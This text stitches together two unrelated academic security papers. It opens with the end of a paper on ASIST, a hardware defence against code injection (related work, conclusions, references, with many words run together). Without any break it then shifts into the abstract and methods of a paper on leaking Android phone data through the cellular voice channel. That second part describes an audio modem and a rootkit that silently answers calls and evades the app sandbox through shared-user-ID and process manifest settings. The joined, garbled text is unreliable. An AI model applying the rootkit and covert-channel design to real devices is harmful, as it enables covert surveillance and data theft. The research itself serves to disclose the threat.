they are loaded into a register. Both techniques are implemented
with compiler extensions, so they require program recompilation.
In contrast, BinArmor [ 46] protects existing binaries from buffer
overflows without access to source code, by discovering the data
structuresand thenrewriting thebinary.
Other randomization-based defenses. Address Space Layout
Randomization (ASLR) [ 39] randomizes the memory layout of a
process at runtime or at compile time to protect against code-reuse
attacks. Giuffrida et al. [ 27] propose an approach with address
spacerandomizationtoprotecttheoperatingsystemkernel. Bhatkar
et al. [11] present randomization techniques for the addresses of
the stack, heap, dynamic libraries, routines and static data in an
executable. Wartell et al. [ 52] randomize the instruction addresses
at each execution to address code-reuse attacks. Jiang et al. [ 30]
prevent code injections byrandomizing thesystemcallnumbers.
Hardware support for security. There are numerous research
effortsaimingtoprovidehardwaresupportforsecuritywithoutsac-
rificing performance. Dalton et al. [ 22,23] propose a hardware-
based architecture for dynamic information flow tracking, by ex-
tending a SPARC V8 processor with four tag bits per each register
and memory word, as well as with tag propagation and runtime
checks to defend against buffer overflows and high-level attacks.
Greathouse et al. [ 28] present a design for accelerating dynamic
analysis techniques with hardware support for unlimited watch-
points. These efforts significantly reduce the performance cost for
dynamicinformationflowanalysis,whichhasaveryhighoverhead
in software-based implementations. Frantzen and Shuey [ 25] im-plement a hardware-assisted technique for the SPARC architecture
toprotectthereturnaddress. Tucketal.[ 50]proposehardwareen-
cryption to protect function pointers from buffer overflow attacks
withimprovedperformance,extendingthecomputationallyexpen-
sive software-based pointer encryption used by pointguard [ 20].
Our approach is similar to these works: we also propose hardware
support for another existing technique that prevents the execution
of any code thatis notauthorized toruninthesystem.
7. CONCLUSIONS
Wehavepresentedthedesign,implementationandevaluationof
ASIST:ahardware-assistedarchitectureforISRsupport. ASISTis
designedtooffer (i)improvedperformance,withoutruntimeover-
head,(ii)improved security, by protecting the operating system
and resisting key guessing attempts, and (iii)transparent opera-
tion, with shared libraries support and no need for any program
modifications. OurexperimentalevaluationshowsthatASISTdoes
not impose any significant overhead (less than 1.5%), while it is
able to prevent code injection attacks that exploit user-level and
kernel-levelvulnerabilities. Wehavealsoproposedanewapproach
fordynamiccodeencryptionatthepagefaulthandlerwhencodeis
firstloadedintoprocess’smemory. Thisapproachtransparentlyen-
cryptsunmodifiedbinariesthatmayusesharedlibrarieswithanew
key at each execution, offering protection against incremental key
guessingattacks. Ourresultsindicatethatdynamiccodeencryption
is efficient, without adding any overhead, due to the low text page
fault rate. Our work shows that ASIST can address most of the
limitations of existing software-based ISR implementations while
adding less than 0.7% additional hardware to a SPARC processor.
We believe that ASIST can be easily ported to other architectures
tostrengthen existingdefenses against code injection attacks.
Acknowledgments
We thank the anonymous reviewers for their valuable feedback.
We also thank the Computer Architecture and VLSI Systems Lab
of FORTH-ICS for providing access to FPGAs and design tools.
The project was co-financed by the European Regional Develop-
ment Fund (ERDF) and national funds, under the Operational Pro-
gramme “Competitiveness & Entrepreneurship” (OPCE II), Mea-
sure “COOPERATION” (Action I). This work was also supported
in part by the European Union’s Prevention of and Fight against
Crime Programme “Illegal Use of Internet” - ISEC 2010 Action
Grants,grantref. HOME/2010/ISEC/AG/INT-002,andbytheFP7
projects NECOMA and SysSec, funded by the European Commis-
sionunder GrantAgreements No. 608533and No. 257007.
8. REFERENCES
[1] The SPARC ArchitectureManual,Version8. www.sparc.com/
standards/V8.pdf .
[2] USA NationalVulnerabilityDatabase. http://web.nvd.nist.
gov/view/vuln/statistics .
[3] LinuxKernelRemote BufferOverflowVulnerabilities. http://
secwatch.org/advisories/1013445/ , 2006.
[4] OpenBSD IPv6mbufRemoteKernelBufferOverflow. http://www.
securityfocus.com/archive/1/462728/30/0/threaded ,
2007.
[5] MicrosoftSecurityBulletinMS08-067–Critical. http://www.
microsoft.com/technet/security/Bulletin/MS08-067.
mspx, 2008.
[6] MicrosoftWindowsTCP/IP IGMP MLD RemoteBufferOverflow
Vulnerability. http://www.securityfocus.com/bid/27100 ,
2008.
[7] Microsoftsecurityadvisory(975191): Vulnerabilitie sintheftpservicein
internetinformationservices. http://www.microsoft.com/
technet/security/advisory/975191.mspx ,2009.
[8] Microsoftsecurityadvisory(975497): Vulnerabilitie sinsmbcouldallow
remotecodeexecution. http://www.microsoft.com/technet/
security/advisory/975497.mspx ,2009.
[9] E. G. Barrantes,D. H. Ackley,S. Forrest,andD. Stefanov i ́c.Randomized
InstructionSetEmulation. ACM TransactionsonInformationandSystem
Security,8(1),2005.
[10] E. G. Barrantes,D. H. Ackley,T. S. Palmer,D. Stefanovi c,andD. D.
Zovi.RandomizedInstructionSetEmulationtoDisruptBina ryCode
InjectionAttacks.In ACM ConferenceonComputerandCommunications
Security(CCS) ,2003.
[11] S. Bhatkar,D. C. DuVarney,andR. Sekar.AddressObfusc ation: an
EfficientApproachtoCombataBoardRangeofMemoryErrorExp loits.
InUSENIX SecuritySymposium ,2003.
[12] T. Bletsch,X. Jiang,V. W. Freeh,andZ. Liang.Jump-Ori ented
Programming: A NewClassofCode-ReuseAttack.In ACM Symposium
onInformation,ComputerandCommunicationsSecurity(ASI ACCS),
2011.
[13] S. W.Boyd,G. S. Kc, M. E. Locasto,A. D. Keromytis,andV. Prevelakis.
On theGeneralApplicabilityofInstruction-SetRandomiza tion.IEEE
TransactionsonDependableSecureComputing ,7(3),2010.
[14] E. Buchanan,R. Roemer,H. Shacham,andS. Savage.WhenG ood
InstructionsGo Bad: GeneralizingReturn-OrientedProgra mmingto
RISC. In ACM ConferenceonComputerandCommunicationsSecurity
(CCS), 2008.
[15] P. P. BungaleandC.-K. Luk.PinOS: A ProgrammableFrame workfor
Whole-SystemDynamicInstrumentation.In ACM SIGPLAN/SIGOPS
ConferenceonVirtualExecutionEnvironments(VEE) , 2007.
[16] H. Chen,Y. Mao,X. Wang,D. Zhou,N. Zeldovich,andM. F. K aashoek.
LinuxKernelVulnerabilities: State-of-the-ArtDefenses andOpen
Problems.In Asia-PacificWorkshoponSystems(APSys) ,2011.
[17] S. Chen,J. Xu,E. C. Sezer,P. Gauriar,andR. K. Iyer.Non -Control-Data
AttacksAreRealisticThreats.In USENIX SecuritySymposium ,2005.
[18] S. ChristeyandA. Martin.VulnerabilityTypeDistribu tionsinCVE.
http://cve.mitre.org/docs/vuln-trends/
vuln-trends.pdf , 2007.
[19] C. Cowan,M. Barringer,S. Beattie,G. Kroah-Hartman,M . Frantzen,and
J. Lokier.FormatGuard: AutomaticProtectionFromprintfF ormatString
Vulnerabilities.In USENIX SecuritySymposium ,2001.
[20] C. Cowan,S. Beattie,J.Johansen,andP. Wagle.Pointgu ardTM:
ProtectingPointersfromBufferOverflowVulnerabilities. InUSENIX
SecuritySymposium ,2003.
[21] C. Cowan,C. Pu,D. Maier,H. Hintony,J.Walpole,P. Bakk e,S. Beattie,
A. Grier, P. Wagle,andQ. Zhang.StackGuard: AutomaticAdap tive
DetectionandPreventionofBuffer-OverflowAttacks.In USENIX
SecuritySymposium ,1998.
[22] M. Dalton,H. Kannan,andC. Kozyrakis.Raksha: AFlexib leInformation
flowArchitectureforSoftwareSecurity.In ACM/IEEE International
SymposiumonComputerArchitecture(ISCA) ,2007.
[23] M. Dalton,H. Kannan,andC. Kozyrakis.Real-WorldBuff erOverflow
ProtectionforUserspace&Kernelspace.In USENIX SecuritySymposium ,
2008.
[24] D.Danchev.Managedpolymorphicscriptobfuscationse rvices.http://
ddanchev.blogspot.com/2009/08/
managed-polymorphic-script-obfuscation.html ,2009.
[25] M. FrantzenandM. Shuey.StackGhost: HardwareFacilit atedStack
Protection.In USENIX SecuritySymposium ,2001.
[26] GaislerResearch.Leon3synthesizableprocessor. http://www.
gaisler.com .
[27] C. Giuffrida,A. Kuijsten,andA. S. Tanenbaum.Enhance dOperating
SystemSecurityThroughEfficientandFine-grainedAddress Space
Randomization.In USENIX SecuritySymposium ,2012.[28] J.L. Greathouse,H. Xin, Y. Luo,andT. Austin.ACasefor Unlimited
Watchpoints.In ACM IntrnationalConferenceonArchitecturalSupport
forProgrammingLanguagesandOperatingSystems(ASPLOS) , 2012.
[29] W. Hu,J. Hiser,D. Williams,A. Filipi,J.W.Davidson,D . Evans,J. C.
Knight,A. Nguyen-Tuong,andJ.Rowanhill.SecureandPract ical
DefenseAgainstCode-InjectionAttacksusingSoftwareDyn amic
Translation.In ACM SIGPLAN/SIGOPS ConferenceonVirtualExecution
Environments(VEE) , 2006.
[30] X.Jiang,H.J.Wangz,D.Xu,andY.-M.Wang.RandSys: Thw artingCode
InjectionAttackswith SystemServiceInterfaceRandomiza tion.InIEEE
InternationalSymposiumonReliableDistributedSystems( SRDS),2007.
[31] G. S. Kc, A. D. Keromytis,andV. Prevelakis.Countering Code-Injection
AttacksWith Instruction-SetRandomization.In ACM Conferenceon
ComputerandCommunicationsSecurity(CCS) , 2003.
[32] V. P. Kemerlis,G. Portokalidis,andA. D. Keromytis.kG uard:
LightweightKernelProtectionAgainstReturn-to-UserAtt acks.In
USENIX SecuritySymposium ,2012.
[33] K. P. Lawton.Bochs: APortablePCEmulatorforUnix/X. LinuxJournal ,
1996.
[34] C.-K. Luk,R. Cohn,R. Muth,H. Patil,A. Klauser,G. Lown ey,
S. Wallace,V. J.Reddi,andK. Hazelwood.Pin: BuildingCust omized
ProgramAnalysisToolswithDynamicInstrumentation.In ACM
SIGPLAN ConferenceonProgrammingLanguageDesignand
Implementation(PLDI) , 2005.
[35] Nergal.TheAdvancedreturn-into-lib(c)Exploits: Pa X CaseStudy.
Phrack,11(58),2001.
[36] N. NethercoteandJ.Seward.Valgrind: AFrameworkforh eavyweight
DynamicBinaryInstrumentation.In ACM SIGPLAN Conferenceon
ProgrammingLanguageDesignandImplementation(PLDI) , 2007.
[37] J.Oberheide,M.Bailey,andF.Jahanian.PolyPack: AnA utomatedOnline
PackingServiceforOptimalAntivirusEvasion.In USENIX Workshopon
OffensiveTechnologies(WOOT) , 2009.
[38] L.D. Paulson.NewChipsStopBufferOverflowAttacks. IEEEComputer ,
37(10),2004.
[39] PaXTream. Homepageof PaX. http://pax.grsecurity.net/ .
[40] P. Porras,H. Saidi,andV. Yegneswaran.ConfickerCanal ysis.SRI
International ,2009.
[41] G. PortokalidisandA. D. Keromytis.FastandPractical Instruction-Set
RandomizationforCommoditySystems.In AnnualComputerSecurity
ApplicationsConference(ACSAC) , 2010.
[42] K. Scott,N. Kumar,S. Velusamy,B. Childers,J.W. David son,andM. L.
Soffa.RetargetableandReconfigurableSoftwareDynamicTr anslation.In
InternationalSymposiumonCodeGenerationandOptimizati on:
Feedback-DirectedandRuntimeOptimization(CGO) , 2003.
[43] A. Seshadri,M. Luk,N. Qu,andA. Perrig.SecVisor: ATin y Hypervisor
toProvideLifetimeKernelCodeIntegrityforCommodityOSe s. InACM
SymposiumonOperatingSystemsPrinciples(SOSP) ,2007.
[44] S. Sethumadhavan,S. J.Stolfo,A. Keromytis,J.Yang,a ndD. August.
The SPARCHS Project: HardwareSupportforSoftwareSecurit y.In
SysSecWorkshop ,2011.
[45] H. Shacham.TheGeometryofInnocentFleshontheBone:
Return-into-libcwithoutFunctionCalls(onthex86).In ACM Conference
onComputerandCommunicationsSecurity(CCS) ,2007.
[46] A. Slowinska,T. Stancescu,andH. Bos.BodyArmor forBi naries:
PreventingBufferOverflowsWithoutRecompilation.In USENIX Annual
TechnicalConference(ATC) , 2012.
[47] K. Z. Snow,L. Davi,A. Dmitrienko,C. Liebchen,F. Monro se,andA.-R.
Sadeghi.Just-In-TimeCodeReuse: On theEffectivenessofF ine-Grained
AddressSpaceLayoutRandomization.In IEEE SymposiumonSecurity
andPrivacy ,2013.
[48] A. N. Sovarel,D. Evans,andN. Paul.Where’stheFEEB? th e
Effectivenessof InstructionSetRandomization.In USENIX Security
Symposium ,2005.
[49] StandardPerformanceEvaluationCorporation(SPEC). SPEC CINT2006
Benchmarks. http://www.spec.org/cpu2006/CINT2006 .
[50] N. Tuck,B. Calder,andG. Varghese.HardwareandBinary Modification
SupportforCodePointerProtectionFromBufferOverflow.In IEEE/ACM
InternationalSymposiumonMicroarchitecture(MICRO) , 2004.
[51] X. Wang,H. Chen,Z. Jia,N. Zeldovich,andM. F. Kaashoek .Improving
IntegerSecurityforSystemswithKINT. In USENIX Symposiumon
OperatingSystemDesignandImplementation(OSDI) , 2012.
[52] R. Wartell,V. Mohan,K. W. Hamlen,andZ. Lin.BinarySti rring:
Self-randomizingInstructionAddressesofLegacyx86Bina ryCode.In
ACM ConferenceonComputerandCommunicationsSecurity(CC S),
2012.
[53] Y. WeissandE. G. Barrantes.Known/ChosenKeyAttacksa gainst
SoftwareInstructionSet Randomization.In AnnualComputerSecurity
ApplicationsConference(ACSAC) , 2006.
[54] Xilinx.XilinxUniversityProgramXUPV5-LX110T Devel opment
System.http://www.xilinx.com/support/
documentation/boards_and_kits/ug347.pdf , 2011. 
Abstract — Investigating network covert channels in 
smartphones has become increasingly important as smartphones 
have recently replaced the role of traditional computers. 
Smartphones are subject to traditional computer network covert 
channel techniques. Smartphones a lso introduce new sets of covert 
channel techniques as they add more capabilities and multiple 
network connections. This work  presents  a new network covert 
channel in smartphones. The research studie s the ability to leak 
information from the smartphones’ a pplications by reaching the 
cellular voice stream, and it ex amine s the ability to employ the 
cellular voice channel to be a potential medium of information 
leakage through carrying modulated “speech -like” data covertly . 
To validate the theory, an Android s oftware audio modem has 
been developed and it was able to leak data successfully through 
the cellular voice channel stream by carrying modulated data with 
a throughput of 13 bps with 0.018% BER . Moreover, Android 
security policies are investigated and broken in order to 
implement a user -mode rootkit that open s the voice channels by 
stealthily answering an incoming voice call. Multiple scenarios are 
conducted  to verify the effectiveness of the proposed covert 
channel.   This study identifies a new pot ential smartphone covert 
channel,  and discusses some security vulnerabilities in Android OS 
that allow the use of this channel demonstrating the need to  set 
countermeasures against this kind of breach.  
 
Index Terms — Android security, cellular network secur ity, 
covert channel, data exfiltration , rootkit.  
INTRODUCTION  
 
Network covert channels represent a significant problem due 
to their security implications . Thus many research efforts have 
been focused on their identification, detection, and prevention.  
Covert channel identification is the process of discovering a 
shared resource that might be utilized for covert communication. 
This research contribute s to the field by identifying a new 
network covert channel in smartphones.   
Smartphones are always connected to the cellular network; 
however, little effort has been directed at investigating potential 
security threats  with its covert communication . Previously, t he 
cellular voice channel ha d never been used to launch such 
attacks  to the best of our knowledge . This service w as designed 
to carry audio only . Thus cellular service providers have not 
applied any information security protection systems , such as 
firewalls or intrusion detection systems,  to guard cellular voice 
channel traffic in the cellular network  core. Thus  these channels  
are a prime choice over which to attempt a covert channel.   
Theoretically , this channel could be employed  in 
smartphones  to conduct multiple covert malicious activities , 
such as sending commands, or even leaking i nformation. As 
there are some past research that studied modulating data to be “speech -like” and transmitting it through a cellular voice 
channel using a GSM modem and a computer [ 1-3]. In addition 
to the fact that  smartphone hardware designers introduced a new 
smartphone design that provides higher -quality audio and video 
performance and longer battery life [ 4-5], this research 
discovered that, the new design allows smartphone applications 
to reach the cellular voi ce stream.  Thus  information in the 
application could be intentionally or unintentionally leaked, or 
malware could be spread through the cellular voice stream. This 
could be accomplished by implementing a simple audio modem 
that is able modulate date to be  “speech -like” and access the 
cellular voice stream to inject information to smartphones’ 
cellular voice cannel .  
This covert channel could be accompanied with rootkit that  
alters phone services to  hide the covert communication 
channels . To investigate the  potential threats with this covert 
channel, Android security mechanisms w ere tested and it was 
demonstrated that it is possible to build an Android persistent 
user-mode rootkit to intercept Android telephony API calls to 
answer incoming calls without the user or the system’s 
knowledge. The developed modem  along with the rootkit  
successfully leaked data from the smartphone’s application and 
through cellular voice channel stream by carrying modulated 
data with a throughput of 13 bps with 0.018% BER.  
 
I. LITERATURE REVIEW  
The covert channel concept was first presented by Lampson 
in 1973 as a communication channel that  was neither designed 
nor intended for carrying information . [6]. A covert channel 
utilizes mechanisms that are not intended for communication 
purposes, thereby violating the network’s security policy [ 7]. 
Three key conditions were introduced that help in the emergence 
of a covert channel: 1) a global shared resource between the 
sender and the receiver must be present, 2) the ability to alter the 
shared resource, and 3) a way to accomplish synchronization 
betwee n the sender and the receiver [8 ]. The cellula r voice 
channel has all three conditions, making it an ideal channel for 
implementing a covert channel.  Network covert channel field 
research currently focuses on exploiting weaknesses in common 
Internet protocols such as TCP/IP [ 9], HTTP [ 10], VoIP [1 1], & 
SSH [1 2] to embed  a covert communication. In the cellular 
network field, it has been demonstrated  that high capacity covert 
channels in SMS can be embedded and used as a data exfiltration 
channel by composing the SMS in Protocol Description Unit 
(PDU) mode [1 3]. In [1 4] the authors introduced stenographic 
algorithms to hide data in the context of MMS to be used in on -
time password and key communication. Cellular voice channel 
in smartphones has never been attempted  before  to the best of 
our knowledge .  
 A New  Covert Cha nnel over Cellular V oice 
Channel in Smartphone s 
Bushra Aloraini, Daryl Johnson, Bill Stackpole, and Sumita Mishra  
Golisano College of Computing and Information Sciences  
Rochester Institute of Technology  
Rochester, NY, USA  
 
BACKGROUND  INFORMATION  
A. Smartphone Architecture  
Smartphones consist of two main processors, the baseband 
processor (BP) and the application processor (AP). AP is 
responsible for the user interface and applications. BP has a 
Real-Time Operating System (RTOS ), such as Nucleus and 
ThreadX, while AP is controlled by Smartphone OS such as  
Android.  BP handles radio access to the cellular network, and 
provides communication protocols such as GSM, GPRS, 
UMTS, etc. AP is responsible for the user interface and 
applications. These two processors communicate through 
shared -memory or a dedicated serial chan nel. Cellular voice 
call routing and control are achieved typically by the BP only, 
whereas the AP handles all other  multimedia functions. Thus , 
end user s and application s are not able to access the cellular 
voice stream. However, as users spend more time using mobile 
phones for more media -rich applications, most smartphone 
hardware designers wanted to provide higher -quality audio and 
video performance and longer battery life. Therefore, they first 
introduced a separate dedicated processor for audio/video 
decoding to meet these increasing needs [ 4]. Then, hardware 
designers  merged the audio digital signal processor (DSP) into 
the AP [5]. 
As has been discovered in this research, this new design has 
resulted in  the audio routing functionalities , including cellular 
voice call ing, being controlled by the AP (Figure 1) adapted 
from [ 4]. This feature introduced  a new security vulnerability . 
The audio path to the cellular voice channel could be reached 
and controlled from the AP and potentially the end user.  
 
 
B. Cellular Voice traffic Overview  
In digital cellular systems , like GSM and CDMA, when 
someone makes a phone call , the voice first passe s to the 
microphone . It would  then pass through the analog -to-digital 
converter (ADC) that converts the analog stream  into digital 
data using Pulse Code Modulation (PCM) to be understood by 
the cell phone. The PCM method is utilized to  represent 
sampled  analog signals in digital  form by recording a binary 
representation of the magnitude of the audio sample, and then 
the sample is encoded as an integer. The data stream then is 
processed and transmitted through the cellular core network in 
digital form.  
The audio data stream , travel ing among the cellular channels , is compressed to allow greater channel capacity. The cellular 
channels are band -limited channels, so audio signals should 
have frequencies within the telephone voice band which is 
between 300 and 3400 Hz. In order to reduce the  bandwidth of 
the voice call and save the power of the cellphone, 
Discontinuous Transmission (DTX) is used to allow the cell 
phone transmitter to be turned off when the user is not talking. 
To do so and detect silence, DTX uses Voice Activity Detection 
(VAD) which is a unit that determines whether the speech frame 
includes speech or a speech pause to reduce the transmission to 
only speech and to reject noise and silence. Once the frame has 
been labeled as non -speech, it is dismissed instead of being 
transmi tted. When the data stream is received on the other side, 
it is restored  to the original source signal  format  and the digital –
to-analog (DAC) module converts the bit stream back to audio 
wave.  
 
C.  Android OS Overview  
Android  is an open source operating syste m based on 
the Linux kernel. The Android operating system consists of five 
software components within four main layers: Linux kernel, 
libraries, Android runtime, application framework, and 
applications ( Figure 2). The first layer is the Linux kernel layer 
that provides main system functionalities, such as  networking 
and device driver  management as it communicates with the 
hardware and the BP. 
The second layer includes two components: a set of libraries 
to provide multiple system services, such playing and r ecording 
audio and video, and an Android Runtime environment which 
has a main component , Dalvik Virtual Machine (DVM). DVM 
allows every Android application to run in its own process 
under a unique UNIX UID , and it  is responsible for executing 
binaries of a ll applications located in the application layer.  The 
third layer is the application framework that offer s Application 
Programming Interfaces (API) to third party application 
developers.  The fourth layer is the applications layer that is 
written fully in Java, and represents the installed user 
application. Applications are written in Java and compiled to 
the Dalvik Executable (DEX) byte -code format.  Every 
application executes within its own instance of DVM 
interpreter.  
 
 
Figure 1    Cirrus Logic Audio Subsystem Architecture show 
that the DSP , adapted from [ 4] 
Figure 2   Android Architecture Layer  
D. Android Telephony Framework  
Android  telephony stack is responsible for the 
communication between BP and AP. Android telephony stack 
consists of four main layers:  applications, framework, radio 
interface layer, and BP (Figure 3).  The application layer 
involves all the smartphone telephony applications, such as 
Dialer, SMS, etc. Phone application s in the application layer 
communicate directly with the internal API in the telephony 
framework to place and tear down phone calls.  Android 
telephony framework provides APIs for the phone application ; 
however, APIs cannot be entered from any other applications 
that are not part of the Android system. The telephony requests 
are passed to the BP. BP replies to the application through the 
Telephony framework.   
The communications  between the telephony framework and 
the BP are handled by  the Radio Interface Layer  (RIL).  The 
RIL communicates with the BP by utilizing a single serial line. 
RIL has two main components: a RIL Daemon and a Vendor 
RIL. The RIL Daemon connects the telephony framework to the 
Vendor RIL, initiates the modem , and reads the system 
propert ies to locate the proper library for the Ven dor RIL. The 
Vendor RIL is the BP driver . There are various vendors , 
therefore, each vendor has a different implementation of the 
vendor RIL.   
 
  
Figure 3 Android Telephony Architecture  
E. Android Media Framework  
Since it is important to understand how smartphone cellular 
voice calls take place, it is essential to comprehend  how 
Android handles audio streams which forms an important part 
in carrying out a cellular voice call.  Android Application 
Framework takes ca re of Android ’s multimedia system; it uses 
the Android media  APIs to call media native code to contact the 
audio hardware ( Figure 4). The Android audio libraries include  
two native layers dealing  with audio software: Audio Flinger 
and Audio Hardware Interf ace (HAL).  
Audio Flinger  communicates with the HAL layer which 
represents the hardware abstraction layer that hides audio 
drivers from the Android platform. Audio Flinger is the audio 
server that provides some required audio functions, such as audio stream  routing and mixing, since the audio stream can be 
either input or output to/from multiple microphones, speakers, 
and applications. Audio Flinger performs audio routing by 
setting a routing mode, such as MODE_IN_CALL, 
MODE_IN_COMMUNICATION, or MODE_NORMAL,  
which is then passed into audio.h  interface in Audio HAL 
which, in turn, determines the routing path.  
When some applications use Audio Flinger to redirect the 
audio stream as STREAM_VOICE_CALL, some vendor -
specific audio HAL implementations redirect the stream that 
comes from/to an application from/to the actual stream voice 
call by default. In other smart phones, redirecting voice call 
stream from/to an application from/to the actual cellular voice 
stream is also possible, since  the audio routing is currently 
accomplished using the application processor , not the BP as 
mentioned earlier.  This is achieved by  making some 
modifications to audio HAL and some application framework 
components, such as Audio Service and Audio System in 
smartphones that cannot redirect the required audio path by 
default.  
 
Figure 4 Android Audio System  
F. Android Phone Calls  
In Android , phone calls are achieved using both the 
telephony  and media frameworks. The phone application runs 
inside the com.android.phone process, which is comprised of 
multiple components such as SIP, SMS , and  phone application. 
All of these components utilize th e telephony framework APIs 
to communicate to the BP through an RIL socket. Hence, the 
phone application communicates to the BP by calling the 
framework APIs to initiate and receive voice calls.   When an 
incoming call reaches the destination cell phone , BP sends a 
request to RIL, which communicates to the phone application 
as a ringing call. Once the user answers the call, the phone 
application sends a message to the RIL to open the voice 
channel, and the Android media system switches on the voice 
call chan nel. 
 
G. Android Security  
Android framework involves multiple security mechanisms, 
such as application sandboxing, application signing, and 
Android permission framework. The application sandboxing 
mechanism is employed to isolate an application from system 

resources, actual hardware, and from the other application 
resources. Sandboxing is performed by assigning a unique user 
ID to each application to ensure that it has its own sandboxed 
execution environment.  Application signing is a key security 
mechanism in  Android. All Android applications must  be 
signed independently with a self -created key using public key 
infrastructure. Applications that are signed with the same key 
could share the same UID and play in the same sandbox.  
 The Android permission framewor k is utilized to control 
access to sensitive system resources by applying Mandatory 
Access Control (MAC) on Inter Component Communication 
(ICC). Therefore, each application define s a list of permissions 
that are approved during the installation process . 
 
MATERIALS  AND  METHODS  
 
H. Audio Modem Design   
The modem  design  consists of an encoder and decoder pair 
which works  entirely in software. The encoder converts raw 
data into “speech -like” waveforms to be injected into the 
microphone of the downlink voice stream. The audio signals 
then travel among the cellular voice channel as speech in digital 
form, and reach the secon d cell phone  to be played over uplink 
voice stream’s speaker . They are then demodulated and 
converted back into the original data.  The designed modem 
utilizes Morse code combined with Frequency Shift -Keying 
modulation ( Figure 5). 
 
 
Figure 5 Audio Modem Design  
I. The Encoder  
The encoder encodes text  information into Morse code as a 
series of dots and dashes . Then i t generates pure sine waves of 
two frequencies using FSK modulation: one frequency 
represents a dot and a different frequency represe nts a dash 
using the following equation for each sample in the buffer:  
 
f(x) = Amplitude  ∗  sin(2πf) ∗( sample  /
 sampleRate )   (1) 
 
Where:  
 Amplitude: the amplitude of the wave . It is a constant value 
for all waves.  
 f: the fr equency of the wave . This is a variable and it 
depends on if the current code is a dot or a dash.   Sample: the current sample in the buffer.  
 SampleRate: the modem sampling rate which is 8000 KHz.  
 Sample / sampleRate: represents the current time.  
 
 
The audio  modem works as following:  
1) Map each character to its corresponding Morse code.  
2) Play a hail tone to indicate the beginning of the audio data.  
3) For every code:  
 Play a tone with high frequency if the code is a dash.  
 Play a tone with low frequency if the code is a dot.  
4) Play a silence to separate each character.  
5) Play a long silence to separate each word.  
6) Form each code to be a “speech -like” waveform of 20 0 ms 
frame length.  
The frequencies that were chosen with the modem are 600 
and 1000 to satisfy the demands of  the cellular network voice 
channel bandwidth (300Hz and 3400Hz). In addition, the 
sampling rate was selected to be 8000 kHz to suit the telephony 
system sampling rate that carries speech signals. Each 20 0 ms 
voice frame is injected into the GSM encoder to  avoid the 
distortion that could be issued from the VAD . 
J. The Decoder  
The decoder does the reverse function of the encoder. The 
decoder performs spectral analysis to analyze each received 
sample and estimates its frequency to retrieve the original data. 
Fast Fourier Transform (FFT) algorithm was used to analyze 
the spectrum and detect the frequency pitch. Therefore, when 
the decoder receives an audio wave sample, the following steps 
are accomplished:  
1) Low-pass filter is applied  to the audio signal to get rid of 
noise and enhance the reliability of the pitch detection.  
2) Hann window function is applied to the input data to 
increase detection quality by examining  the important 
details of the signal rather than analyzing the entire signal, 
and to avoid signal leak age in both sides of the wave.  
3) FFT is performed on the input data, which is an algorithm 
that quickly computes the frequency of a given signal.  The 
output of the FFT is an array of N complex numbers that 
has real and imaginary parts.  
4) Normalize the FFT bin s to bring the peak amplitude to a 
normal level, and hence making all the received audio 
signal the same volume so as not to affect the quality of 
frequency detection.  
5) Calculate the magnitude values of each FFT bin, using the 
following formula:  
 
 magn itude [i]= sqrt ( real [i]∗real [i]+ imag [i]∗
 imag  [i])  (2) 
 
6) Get the bin of the maximum magnitude value in the FFT 
data.  
7) Calculate the frequency of the index of the maximum 
magnitude value to detect the signal frequency. The 
frequency is cal culated by this equation:           
 

    freq  = i ∗ SampleRate  / N (3) 
 
Where:  
 i = index of magnitude  
 SampleRate =  the modem sampling rate  
 N = size of  FFT data  
 
8) Finally compare the received frequency to the dot and dash 
frequencies value  with a minor tolerance.  
 
K. Modem Design Constraints and Challenges  
To develop a modem that copes with cellular network 
channel characteristics, some constraints on audio signal 
needed to be  taken into consideration.  
1) The generated audio frequencies must  fit into ban dwidth 
between 300Hz and 3400Hz. Otherwise , an ultrasonic 
signal  is generated  that can’t be heard by the human ear and 
is not suitable for this channel.  
2) The generated audio signals should pass through the voice 
channel without being omitted by VAD which is primarily 
used to stop frame transmission at silence.  
3) Cellular networks employ speech compression code ces in 
order to save bandwidth and enhance sound quality. A s a 
result, these speech compression techniques could 
significantly distort audio sig nals that are not “speech -
like”,  so the generated signal must  retain typical speech 
characteristics.  
In addition to the constraints mentioned above, there are a 
number of challenges in implementing such a modem. One of 
the challenges of the cellular voice channel is that a voice call 
between two cell phones  is achieved in real time . Hence, there 
are no retransmission s in case of a missing voice frame. 
Sometimes, a voice frame could not be received by the other 
cell phone  due to  radio interference  or the voi ce frame could be 
dropped intentionally by the core network when frame stealing 
scenario happens. Frame stealing usually happens during call s 
where  a user receives an incoming waiting call request  and the 
network drops the current voice frame in the conver sation to 
send a notification to the user. On the other hand, smartphone 
capabilities , such as the processor and battery life, as well as the 
quality of audio hardware varies among cell phones ; for 
example one cell phone  speaker that sounds clear and loud 
could be low or unclear in another, as there are no 
standardizations in cell phone  speaker and microphone 
specifications.  
  
L. Audio Modem Implementation  
The modem works as follows: When there is an ongoing 
cellular voice call, the receiver presses  on the receive button to 
obtain the required data. At the sender side, a text message is 
encoded into Morse code , then an Integer array containing  the 
dots and dash  frequencies  is composed. This array is sent to the 
encoder , sampled as sine waves to generate audi o tones and 
injected  into the cellular voice stream using 
AudioManager.STREAM_VOICE_CALL audio track stream.  
At the other end, after Receive button was pressed, it 
constantly records the uplink call stream to detect the hail key which refers to the beginn ing of the real incoming audio data. 
The hail key has a different frequency from the dots and dashes . 
It is generated once at the encoder to indicate the beginning of 
the audio data to be recorded. If the key was found, the Decoder 
decodes the audio waves using FFT algorithm and other signal 
processing functions to process the incoming signals and detect 
the frequencies. Once the audio signal frequencies have been 
determined, the decoder creates an Integer array of the detected 
frequencies which is then  sent to the Morse decoder to retrieve 
the original data.  
  
M. Rootkit  Design   
Besides  an audio modem, it was necessary to employ another 
system  that compromise s smartphone operating systems and 
open cellular voice channels by stealthily answering voice calls 
and performing data exchange. This was accomplished by 
utilizing a rootkit that hides  its presence in the operating system 
and quietly  allow s continuous privileged access . 
N. Bypassing Android Security Mechanisms  
To help the rootkit to catch the incoming calls before being 
delivered to Phone app, it was necessary to find a way to allow 
the rootkit to reach the RIL socket to listen to the BP messages. 
RIL socket is a Linux socket that is owned by 
com.android.phone process only, and it can not be entered from 
outside the phone process. Thus, building the rootkit inside the 
com.android.phone process to communicate to the socket was 
the selected method  to secretly communicate to the BP and to 
intercept its messages.  
Designing a rootkit to wor k inside the Phone process requires 
overcoming the Android application sandboxing mechanism.  
Sandboxing is achieved by assigning a unique User ID for each 
application so the other applications cannot access its data and 
resources unless they have shared U ser ID , process, and their 
certificate match.  The rootkit takes advantages of 
“android:sharedUserId ” and “android:process ” attributes in the 
manifest to play inside the com.android.phone process sandbox.  
